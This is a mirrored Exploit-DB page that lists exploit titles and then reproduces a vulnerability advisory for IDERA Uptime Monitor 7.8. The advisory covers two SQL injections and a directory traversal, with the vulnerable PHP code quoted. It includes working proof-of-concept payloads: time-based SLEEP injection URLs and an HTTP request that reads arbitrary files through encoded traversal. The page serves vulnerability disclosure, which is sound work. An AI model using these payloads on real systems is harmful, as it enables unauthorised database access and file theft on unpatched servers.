exploit-db-mirror/exploits/windows/webapps/44071.md at ccea007282bb78b727f593ce6b59c0e01075fdf2

Offensive Security e630f8c249 DB: 2018-02-16

45 changes to exploits/shellcodes

Cisco ASA - Crash PoC
Cisco ASA - Crash (PoC)

GNU binutils 2.26.1 - Integer Overflow (POC)
GNU binutils 2.26.1 - Integer Overflow (PoC)
K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read
Linux Kernel - 'AF_PACKET' Use-After-Free
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service
Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)
Microsoft Edge Chakra JIT - Memory Corruption
Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass
Microsoft Edge Chakra JIT - Array Type Confusion via InitProto Instructions
Microsoft Edge Chakra JIT - 'Array.prototype.reverse' Array Type Confusion
Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion
Microsoft Edge Chakra JIT - 'LdThis' Type Confusion
Pdfium - Pattern Shading Integer Overflows
Pdfium - Out-of-Bounds Read with Shading Pattern Backed by Pattern Colorspace
Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow
Hotspot Shield - Information Disclosure
Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation
Nitro Pro PDF - Multiple Vulnerabilities
Odoo CRM 10.0 - Code Execution
Dashlane - DLL Hijacking

LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation
Trustwave SWG 11.8.0.27 - SSH Unauthorized Access
Ichano AtHome IP Cameras - Multiple Vulnerabilities
Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution
Ikraus Anti Virus 2.16.7 - Remote Code Execution
McAfee Security Scan Plus - Remote Command Execution
OrientDB - Code Execution
360 Total Security - Local Privilege Escalation
HPE Intelligent Management Center (iMC) 7.2 (E0403P10) - Code Execution
Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution
iBall WRA150N - Multiple Vulnerabilities
GitStack - Unauthenticated Remote Code Execution
Monstra CMS - Remote Code Execution
Ametys CMS 4.0.2 - Unauthenticated Password Reset
DblTek - Multiple Vulnerabilities
FiberHome - Directory Traversal
PHP Melody 2.7.3 - Multiple Vulnerabilities
Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure
Horde Groupware 5.2.21 - Unauthorized File Download
QNAP HelpDesk < 1.1.12 - SQL Injection
Hanbanggaoke IP Camera - Arbitrary Password Change
McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution
Sophos XG Firewall 16.05.4 MR-4 - Path Traversal
Cisco DPC3928 Router - Arbitrary File Disclosure
IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities
Geneko Routers - Unauthenticated Path Traversal
Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution

2018-02-16 05:01:50 +00:00

10 KiB

Raw Blame History

Vulnerabilities Summary

The following advisory describe three (3) vulnerabilities found in IDERA Uptime Monitor version 7.8.

“IDERA Uptime Monitor is a Proactively monitor physical servers, virtual machines, network devices, applications, and services across multiple platforms running on-premise, remotely, or in the Cloud. Uptime Infrastructure Monitor provides a unified view of IT environment health and a GUI that is easily customizable, with a drag-anddrop dashboard design. Create private IT dashboards, team dashboards (server, application, capacity and networking teams, and even the specialist practitioner such as SharePoint farm administrators, etc.), and a network operations center (NOC) for the entire datacenter in minutes.”

The vulnerabilities found are:

SQL Injection (1) SQL Injection (2) Directory Traversal and File Access

Credit

An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor response

We notified IDERA about the vulnerabilities back in March 2017, repeated attempts to re-establish contact and get some answers on the status of the patch for this vulnerabilities went unanswered. At this time there is no solution or workaround for this vulnerability. CVE’s:

SQL Injection (1) – CVE-2017-11470 SQL Injection (2) – CVE-2017-11471 Directory Traversal and File Access – CVE-2017-11469

Vulnerabilities Details

SQL Injection (1)

IDERA Uptime Monitor 7.8 is affected by multiple SQL injection vulnerabilities. User controlled data is included in SQL queries made by the application without first being properly sanitized. As a result a remote unauthenticated user can inject arbitrary SQL queries into the application’s back-end database

The SQL injection vulnerability is located in “/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php”:

if (isset($_GET['query_type'])) {
    $query_type = $_GET['query_type'];
}
if (isset($_GET['uptime_offset'])) {
    $offset = $_GET['uptime_offset'];
}
if (isset($_GET['time_frame'])) {
    $time_frame = $_GET['time_frame'];
} else {
    $time_frame = 3;
}
if (isset($_GET['metricType'])) {
    $metricType = $_GET['metricType'];
}
if (isset($_GET['element'])) {
    $vmware_object_id = $_GET['element'];
}
$json = array();
$oneElement = array();
$performanceData = array();
//date_default_timezone_set('UTC');
$db = new uptimeDB;
if ($db - & gt; connectDB()) {
    echo "";
} else {
    echo "unable to connect to DB exiting";
    exit(1);
}
if ($query_type == "osperf-Mem") {
    $min_mem_usage_array = array();
    $max_mem_usage_array = array();
    $avg_mem_usage_array = array();
    $sql = "SELECT
    e.entity_id,
        e.display_name as NAME,
        date(s.sample_time) as SAMPLE_TIME,
        min(a.free_mem) as MIN_MEM_USAGE,
        max(a.free_mem) as MAX_MEM_USAGE,
        avg(a.free_mem) as AVG_MEM_USAGE,
        min(c.memsize) as TOTAL_CAPACITY,
        max(c.memsize),
        avg(c.memsize),
        day(s.sample_time),
        month(s.sample_time),
        year(s.sample_time)
    FROM
    performance_aggregate a, performance_sample s, entity e, entity_configuration c
    WHERE
    s.id = a.sample_id AND
    s.uptimehost_id = e.entity_id AND
    e.entity_id = c.entity_id AND
    s.sample_time & gt;
    date_sub(now(), interval ". $time_frame . "
        month) AND
    e.entity_id = $vmware_object_id
    GROUP BY
    e.entity_id,
        year(s.sample_time),
        month(s.sample_time),
        day(s.sample_time)

User controlled data entering the HTTP GET parameter “element” is included as part of an SQL query that is executed if the “$query_type” variable is equal to “osperf-Mem”. Because the value of the “$query_type” variable can also be set using the HTTP GET parameter “query_type”, a user can force the application to take the vulnerable code path, and execute the tainted SQL query. Visiting the following URL on a vulnerable installation will trigger the vulnerability, and return a verbose SQL error message.

/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperfMem&element='

Proof of Concept

http://192.168.199.129:9999/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperf-Mem&element=1%20AND%20SLEEP(5)

## SQL Injection (2)
IDERA Uptime Monitor 7.8 is affected by multiple SQL injection vulnerabilities. User controlled data is included in SQL queries made by the application without first being properly sanitized. As a result a remote unauthenticated user can inject arbitrary SQL queries into the application’s back-end database

The vulnerability is very similar in structure to the first SQL vulnerability, and is located in “/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php”

if (isset($_GET['query_type'])) { $query_type = $_GET['query_type']; } if (isset($_GET['uptime_offset'])) { $offset = $_GET['uptime_offset']; } if (isset($_GET['time_frame'])) { $time_frame = $_GET['time_frame']; } else { $time_frame = 3; } if (isset($_GET['metricType'])) { $metricType = $_GET['metricType']; } if (isset($_GET['element'])) { $element_id = $_GET['element']; } $json = array(); $oneElement = array(); $performanceData = array(); //date_default_timezone_set('UTC'); $db = new uptimeDB; if ($db - & gt; connectDB()) { echo ""; } else { echo "unable to connect to DB exiting"; exit(1); } if ($query_type == "xenserver-Mem") { $min_mem_usage_array = array(); $max_mem_usage_array = array(); $avg_mem_usage_array = array(); $getXenServerMemUsedsql = "SELECT e.entity_id, e.display_name as NAME, date(dd.sampletime) as SAMPLE_TIME, min(dd.value) as MIN_MEM_USAGE, max(dd.value) as MAX_MEM_USAGE, avg(dd.value) as AVG_MEM_USAGE, day(dd.sampletime), month(dd.sampletime), year(dd.sampletime) FROM erdc_base b, erdc_configuration c, erdc_parameter p, erdc_decimal_data dd, erdc_instance i, entity e WHERE b.name = 'XenServer' AND b.erdc_base_id = c.erdc_base_id AND b.erdc_base_id = p.erdc_base_id AND p.name = 'hostMemUsed' AND p.erdc_parameter_id = dd.erdc_parameter_id AND dd.erdc_instance_id = i.erdc_instance_id AND dd.sampletime & gt; date_sub(now(), interval ". $time_frame . " month) AND i.entity_id = e.entity_id AND e.entity_id = $element_id GROUP BY e.entity_id, year(dd.sampletime), month(dd.sampletime), day(dd.sampletime) ";


Visiting the following URL will elicit a verbose SQL message from the vulnerable web application.

/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserver-Mem&time_frame=1&element='


## Proof of Concept

http://192.168.199.129:9999/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserverMem&time_frame=1&element=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))tayk)


## Directory Traversal and File Access
User controlled input is not sufficiently sanitized, and then passed to a function responsible for accessing the filesystem. Successful exploitation of this vulnerability enables a remote unauthenticated user to read the content of any file existing on the host, this includes files located outside of the web root folder.

The vulnerable code can be found in get2post.php file:

if(isset($_GET["file_name"]) && $_GET["file_name"] != null){ $fileName = $_GET["file_name"]; $data = file_get_contents($fileName);

$data = str_replace(""", '"', $data);

unlink($fileName);

print("<input type="hidden" name="script" value="".$data."">\n");


User controlled data entering the HTTP GET parameter “file_name” is sanitized by removing all occurrences of the “\” character, and is then passed to the “file_get_contents” function. Next, then contents of the file (now in the $data variable) is printed in the application’s HTTP response.

## Proof of Concept
The following HTTP GET request provides proof-of-concept that will retrieve the contents of a file named “test.txt” that exists in the root of “C:\”

GET /wizards/get2post.php?file_name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5ctest.t xt HTTP/1.1 Host: 192.168.199.129:9999 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PHPSESSID=8q7o2ckle9c6lcte045t7dufe2; cookieId=8q7o2ckle9c6lcte045t7dufe2 Connection: close Upgrade-Insecure-Requests: 1



After executing this proof-of-concept against the vulnerable host, the following HTTP response was received containing the contents of the “test.txt” file that was placed in the root of “C:\”

HTTP/1.1 200 OK Date: Mon, 06 Mar 2017 15:12:05 GMT Server: Apache/2.4.20 (Win64) PHP/5.4.45 OpenSSL/1.0.2g X-Powered-By: PHP/5.4.45 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 796 Connection: close Content-Type: text/html

</html> ```

10 KiB Raw Blame History Unescape Escape